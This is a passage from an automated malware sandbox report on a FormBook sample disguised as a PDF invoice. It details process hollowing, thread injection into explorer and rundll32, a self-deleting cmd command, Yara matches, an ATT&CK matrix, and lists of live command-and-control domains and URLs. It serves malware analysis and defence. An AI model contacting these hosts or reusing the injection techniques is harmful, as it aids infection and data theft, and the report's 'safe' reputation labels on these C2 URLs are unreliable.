          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033BE872 mov eax, dword ptr fs:[00000030h]1_2_033BE872
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033C6870 mov eax, dword ptr fs:[00000030h]1_2_033C6870
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033C6870 mov eax, dword ptr fs:[00000030h]1_2_033C6870
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03360854 mov eax, dword ptr fs:[00000030h]1_2_03360854
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03334859 mov eax, dword ptr fs:[00000030h]1_2_03334859
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03334859 mov eax, dword ptr fs:[00000030h]1_2_03334859
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03342840 mov ecx, dword ptr fs:[00000030h]1_2_03342840
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034008C0 mov eax, dword ptr fs:[00000030h]1_2_034008C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033BC89D mov eax, dword ptr fs:[00000030h]1_2_033BC89D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03330887 mov eax, dword ptr fs:[00000030h]1_2_03330887
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336C8F9 mov eax, dword ptr fs:[00000030h]1_2_0336C8F9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336C8F9 mov eax, dword ptr fs:[00000030h]1_2_0336C8F9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033FA8E4 mov eax, dword ptr fs:[00000030h]1_2_033FA8E4
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0335E8C0 mov eax, dword ptr fs:[00000030h]1_2_0335E8C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0335EF28 mov eax, dword ptr fs:[00000030h]1_2_0335EF28
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exeCode function: 0_2_007A81F7 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_007A81F7
          Source: C:\Windows\SysWOW64\svchost.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exeCode function: 0_2_0077A364 SetUnhandledExceptionFilter,0_2_0077A364
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exeCode function: 0_2_0077A395 SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0077A395
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00C261C0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_00C261C0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00C26510 SetUnhandledExceptionFilter,3_2_00C26510

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Maps a DLL or memory area into another process
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Windows\SysWOW64\svchost.exeThread register set: target process: 2580Jump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeThread register set: target process: 2580Jump to behavior
          Queues an APC in another process (thread injection)
          Source: C:\Windows\SysWOW64\svchost.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Sample uses process hollowing technique
          Source: C:\Windows\SysWOW64\svchost.exeSection unmapped: C:\Windows\SysWOW64\rundll32.exe base address: C20000Jump to behavior
          Writes to foreign memory regions
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 6FD008Jump to behavior
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exeCode function: 0_2_007A8C93 LogonUserW,0_2_007A8C93
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exeCode function: 0_2_00753B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00753B4C
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exeCode function: 0_2_00754A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00754A35
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exeCode function: 0_2_007B4EF5 mouse_event,0_2_007B4EF5
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exe"Jump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\SysWOW64\svchost.exe"Jump to behavior
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exeCode function: 0_2_007A81F7 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_007A81F7
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exeCode function: 0_2_007B4C03 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_007B4C03
          Source: Genesis RMS Private Limited November 2024 pdf.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
          Source: Genesis RMS Private Limited November 2024 pdf.exe, explorer.exe, 00000002.00000002.4131873687.0000000004CE0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1686913297.00000000018A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000002.00000000.1686913297.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000002.4129869928.00000000018A1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000002.00000000.1686041422.0000000001248000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4129302361.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 1Progman$
          Source: explorer.exe, 00000002.00000000.1686913297.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000002.4129869928.00000000018A1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
          Source: explorer.exe, 00000002.00000000.1686913297.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000002.4129869928.00000000018A1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exeCode function: 0_2_0077886B cpuid 0_2_0077886B
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exeCode function: 0_2_007850D7 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_007850D7
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exeCode function: 0_2_00792230 GetUserNameW,0_2_00792230
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exeCode function: 0_2_0078418A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_0078418A
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exeCode function: 0_2_00754AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00754AFE

          Stealing of Sensitive Information

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Genesis RMS Private Limited November 2024 pdf.exe.2680000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Genesis RMS Private Limited November 2024 pdf.exe.2680000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000003.00000002.4129777121.0000000004B10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.4129269808.0000000002C40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.1673176319.0000000002680000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.1734086746.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.4129685702.0000000004AE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.1734335737.0000000000940000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.1734980468.0000000003650000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Genesis RMS Private Limited November 2024 pdf.exeBinary or memory string: WIN_81
          Source: Genesis RMS Private Limited November 2024 pdf.exeBinary or memory string: WIN_XP
          Source: Genesis RMS Private Limited November 2024 pdf.exeBinary or memory string: WIN_XPe
          Source: Genesis RMS Private Limited November 2024 pdf.exeBinary or memory string: WIN_VISTA
          Source: Genesis RMS Private Limited November 2024 pdf.exeBinary or memory string: WIN_7
          Source: Genesis RMS Private Limited November 2024 pdf.exeBinary or memory string: WIN_8
          Source: Genesis RMS Private Limited November 2024 pdf.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 5USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

          Remote Access Functionality

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Genesis RMS Private Limited November 2024 pdf.exe.2680000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Genesis RMS Private Limited November 2024 pdf.exe.2680000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000003.00000002.4129777121.0000000004B10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.4129269808.0000000002C40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.1673176319.0000000002680000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.1734086746.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.4129685702.0000000004AE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.1734335737.0000000000940000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.1734980468.0000000003650000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exeCode function: 0_2_007C6596 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,0_2_007C6596
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exeCode function: 0_2_007C6A5A socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_007C6A5A

          Mitre Att&ck Matrix

          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire Infrastructure2
          Valid Accounts          		2
          Native API          		1
          DLL Side-Loading          		1
          Exploitation for Privilege Escalation          		1
          Disable or Modify Tools          		21
          Input Capture          		2
          System Time Discovery          		Remote Services1
          Archive Collected Data          		2
          Ingress Tool Transfer          		Exfiltration Over Other Network Medium1
          System Shutdown/Reboot
          CredentialsDomainsDefault Accounts1
          Shared Modules          		2
          Valid Accounts          		1
          DLL Side-Loading          		1
          Deobfuscate/Decode Files or Information          		LSASS Memory1
          Account Discovery          		Remote Desktop Protocol21
          Input Capture          		1
          Encrypted Channel          		Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain Accounts2
          Command and Scripting Interpreter          		Logon Script (Windows)2
          Valid Accounts          		3
          Obfuscated Files or Information          		Security Account Manager1
          File and Directory Discovery          		SMB/Windows Admin Shares3
          Clipboard Data          		2
          Non-Application Layer Protocol          		Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook21
          Access Token Manipulation          		1
          DLL Side-Loading          		NTDS215
          System Information Discovery          		Distributed Component Object ModelInput Capture12
          Application Layer Protocol          		Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script512
          Process Injection          		2
          Valid Accounts          		LSA Secrets251
          Security Software Discovery          		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
          Virtualization/Sandbox Evasion          		Cached Domain Credentials2
          Virtualization/Sandbox Evasion          		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items21
          Access Token Manipulation          		DCSync3
          Process Discovery          		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job512
          Process Injection          		Proc Filesystem11
          Application Window Discovery          		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
          Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
          Rundll32          		/etc/passwd and /etc/shadow1
          System Owner/User Discovery          		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1562986 Sample: Genesis RMS Private Limited... Startdate: 26/11/2024 Architecture: WINDOWS Score: 100 29 www.vjoami3.xyz 2->29 31 www.olconsulting.xyz 2->31 33 10 other IPs or domains 2->33 35 Suricata IDS alerts for network traffic 2->35 37 Found malware configuration 2->37 39 Malicious sample detected (through community Yara rule) 2->39 43 9 other signatures 2->43 11 Genesis RMS Private Limited November 2024 pdf.exe 2 2->11         started        signatures3 41 Performs DNS queries to domains with low reputation 31->41 process4 signatures5 51 Binary is likely a compiled AutoIt script file 11->51 53 Writes to foreign memory regions 11->53 55 Maps a DLL or memory area into another process 11->55 14 svchost.exe 11->14         started        process6 signatures7 57 Modifies the context of a thread in another process (thread injection) 14->57 59 Maps a DLL or memory area into another process 14->59 61 Sample uses process hollowing technique 14->61 63 3 other signatures 14->63 17 explorer.exe 62 1 14->17 injected process8 dnsIp9 27 loverhoodie.shop 156.67.73.254, 49909, 80 TESONETLT United States 17->27 20 rundll32.exe 17->20         started        process10 signatures11 45 Modifies the context of a thread in another process (thread injection) 20->45 47 Maps a DLL or memory area into another process 20->47 49 Tries to detect virtualization through RDTSC time measurements 20->49 23 cmd.exe 1 20->23         started        process12 process13 25 conhost.exe 23->25         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          Genesis RMS Private Limited November 2024 pdf.exe26%ReversingLabsWin32.Trojan.Autoitinject
          Genesis RMS Private Limited November 2024 pdf.exe100%Joe Sandbox ML

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          No Antivirus matches

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://www.9-club.storeReferer:0%Avira URL Cloudsafe
          http://www.nfluencer-marketing-83144.bond/ma28/0%Avira URL Cloudsafe
          http://www.iralcity.store/ma28/0%Avira URL Cloudsafe
          http://www.ryptocurrency-22237.bondReferer:0%Avira URL Cloudsafe
          http://www.ueijodeminasoriginal.shop/ma28/0%Avira URL Cloudsafe
          http://www.9-club.store/ma28/www.ueijodeminasoriginal.shop0%Avira URL Cloudsafe
          http://www.loverhoodie.shop0%Avira URL Cloudsafe
          http://www.iralcity.store0%Avira URL Cloudsafe
          http://www.hetangosalon.net/ma28/0%Avira URL Cloudsafe
          http://www.ryptocurrency-22237.bond/ma28/0%Avira URL Cloudsafe
          http://www.loverhoodie.shop/ma28/0%Avira URL Cloudsafe
          http://www.itchen-design-87997.bondReferer:0%Avira URL Cloudsafe
          http://www.9-club.store0%Avira URL Cloudsafe
          http://www.liopew.xyz0%Avira URL Cloudsafe
          http://www.iaokoa.net/ma28/0%Avira URL Cloudsafe
          http://www.nfluencer-marketing-83144.bond0%Avira URL Cloudsafe
          http://www.9-club.store/ma28/0%Avira URL Cloudsafe
          http://www.odgerlazerhats.netReferer:0%Avira URL Cloudsafe
          http://www.fricaduka.store/ma28/www.iralcity.store0%Avira URL Cloudsafe
          http://www.vjoami3.xyzReferer:0%Avira URL Cloudsafe
          http://www.itchen-design-87997.bond/ma28/0%Avira URL Cloudsafe
          http://www.iddyspiderish.life0%Avira URL Cloudsafe
          http://www.odgerlazerhats.net0%Avira URL Cloudsafe
          http://www.ryptocurrency-22237.bond/ma28/www.iaokoa.net0%Avira URL Cloudsafe
          http://www.iaokoa.net/ma28/www.odgerlazerhats.net0%Avira URL Cloudsafe
          www.9-club.store/ma28/0%Avira URL Cloudsafe
          http://www.itchen-design-87997.bond/ma28/www.hetangosalon.net0%Avira URL Cloudsafe
          http://www.hetangosalon.netReferer:0%Avira URL Cloudsafe
          http://www.fricaduka.store/ma28/0%Avira URL Cloudsafe
          http://www.odgerlazerhats.net/ma28/0%Avira URL Cloudsafe
          http://www.hetangosalon.net0%Avira URL Cloudsafe
          http://www.vjoami3.xyz/ma28/www.ryptocurrency-22237.bond0%Avira URL Cloudsafe
          http://www.vjoami3.xyz0%Avira URL Cloudsafe
          http://www.liopew.xyzReferer:0%Avira URL Cloudsafe
          http://www.loverhoodie.shop/ma28/?ghl=g3TxkNl+yn5Twcj+LCxINTWO7KBD43aaoKhKXIKU+srW3oC+3I0AD9gGWk+MTAYfd+/z&DvcT5=gd64Xt4xCL0%Avira URL Cloudsafe
          http://www.hgevb.info/ma28/www.9-club.store0%Avira URL Cloudsafe
          http://www.loverhoodie.shopReferer:0%Avira URL Cloudsafe
          http://www.iddyspiderish.life/ma28/0%Avira URL Cloudsafe
          http://www.nfluencer-marketing-83144.bond/ma28/wSh0%Avira URL Cloudsafe
          http://www.iralcity.storeReferer:0%Avira URL Cloudsafe
          http://www.liopew.xyz/ma28/www.hgevb.info0%Avira URL Cloudsafe
          http://www.nfluencer-marketing-83144.bondReferer:0%Avira URL Cloudsafe
          http://www.hetangosalon.net/ma28/www.loverhoodie.shop0%Avira URL Cloudsafe
          http://www.olconsulting.xyz0%Avira URL Cloudsafe
          http://www.vjoami3.xyz/ma28/0%Avira URL Cloudsafe
          http://www.hgevb.infoReferer:0%Avira URL Cloudsafe
          http://www.fricaduka.storeReferer:0%Avira URL Cloudsafe
          http://www.iaokoa.net0%Avira URL Cloudsafe
          http://www.olconsulting.xyzReferer:0%Avira URL Cloudsafe
          http://www.loverhoodie.shop/ma28/www.vjoami3.xyz0%Avira URL Cloudsafe
          http://www.ueijodeminasoriginal.shopReferer:0%Avira URL Cloudsafe
          http://www.odgerlazerhats.net/ma28/www.olconsulting.xyz0%Avira URL Cloudsafe
          http://www.fricaduka.store0%Avira URL Cloudsafe
          http://www.ryptocurrency-22237.bond0%Avira URL Cloudsafe
          http://www.itchen-design-87997.bond0%Avira URL Cloudsafe
          http://www.iaokoa.netReferer:0%Avira URL Cloudsafe
          http://www.iddyspiderish.lifeReferer:0%Avira URL Cloudsafe
          http://www.olconsulting.xyz/ma28/0%Avira URL Cloudsafe
          http://www.liopew.xyz/ma28/0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          loverhoodie.shop
          		156.67.73.254
          		truetrue
            		unknown
            www.iralcity.store
            		unknown
            		unknowntrue
              		unknown
              www.vjoami3.xyz
              		unknown
              		unknowntrue
                		unknown
                www.loverhoodie.shop
                		unknown
                		unknowntrue
                  		unknown
                  www.iaokoa.net
                  		unknown
                  		unknowntrue
                    		unknown
                    www.olconsulting.xyz
                    		unknown
                    		unknowntrue
                      		unknown
                      www.ryptocurrency-22237.bond
                      		unknown
                      		unknowntrue
                        		unknown
                        www.odgerlazerhats.net
                        		unknown
                        		unknowntrue
                          		unknown
                          www.iddyspiderish.life
                          		unknown
                          		unknowntrue
                            		unknown
                            www.hetangosalon.net
                            		unknown
                            		unknowntrue
                              		unknown
                              www.fricaduka.store
                              		unknown
                              		unknowntrue
                                		unknown
                                www.itchen-design-87997.bond
                                		unknown
                                		unknowntrue
                                  		unknown

                                  Contacted URLs

                                  NameMaliciousAntivirus DetectionReputation
                                  www.9-club.store/ma28/true
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.loverhoodie.shop/ma28/?ghl=g3TxkNl+yn5Twcj+LCxINTWO7KBD43aaoKhKXIKU+srW3oC+3I0AD9gGWk+MTAYfd+/z&DvcT5=gd64Xt4xCLtrue
                                  • Avira URL Cloud: safe
                                  		unknown

                                  URLs from Memory and Binaries

                                  NameSourceMaliciousAntivirus DetectionReputation
                                  https://aka.ms/odirmrexplorer.exe, 00000002.00000002.4132184132.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1688723563.00000000079FB000.00000004.00000001.00020000.00000000.sdmpfalse
                                    		high
                                    http://www.ryptocurrency-22237.bondReferer:explorer.exe, 00000002.00000003.3453705418.000000000CB55000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4140801025.000000000CB09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105523604.000000000CB55000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.9-club.store/ma28/www.ueijodeminasoriginal.shopexplorer.exe, 00000002.00000003.3453705418.000000000CB55000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4140801025.000000000CB09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105523604.000000000CB55000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DVexplorer.exe, 00000002.00000000.1688723563.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4132184132.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                      		high
                                      http://www.9-club.storeReferer:explorer.exe, 00000002.00000003.3453705418.000000000CB55000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4140801025.000000000CB09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105523604.000000000CB55000.00000004.00000001.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.nfluencer-marketing-83144.bond/ma28/explorer.exe, 00000002.00000003.3453705418.000000000CB55000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4140801025.000000000CB09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105523604.000000000CB55000.00000004.00000001.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://api.msn.com:443/v1/news/Feed/Windows?explorer.exe, 00000002.00000000.1691972906.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3107468764.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1688723563.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4132184132.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4134891449.00000000097D4000.00000004.00000001.00020000.00000000.sdmpfalse
                                        		high
                                        http://www.loverhoodie.shopexplorer.exe, 00000002.00000003.3453705418.000000000CB55000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4140801025.000000000CB09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105523604.000000000CB55000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.iralcity.storeexplorer.exe, 00000002.00000003.3453705418.000000000CB55000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4140801025.000000000CB09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105523604.000000000CB55000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://excel.office.comexplorer.exe, 00000002.00000002.4139053792.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1694937333.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                                          		high
                                          https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-weexplorer.exe, 00000002.00000000.1688723563.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4132184132.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                            		high
                                            https://simpleflying.com/how-do-you-become-an-air-traffic-controller/explorer.exe, 00000002.00000000.1688723563.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4132184132.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                              		high
                                              http://www.ryptocurrency-22237.bond/ma28/explorer.exe, 00000002.00000003.3453705418.000000000CB55000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4140801025.000000000CB09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105523604.000000000CB55000.00000004.00000001.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.iralcity.store/ma28/explorer.exe, 00000002.00000003.3453705418.000000000CB55000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4140801025.000000000CB09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105523604.000000000CB55000.00000004.00000001.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.ueijodeminasoriginal.shop/ma28/explorer.exe, 00000002.00000003.3453705418.000000000CB55000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4140801025.000000000CB09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105523604.000000000CB55000.00000004.00000001.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
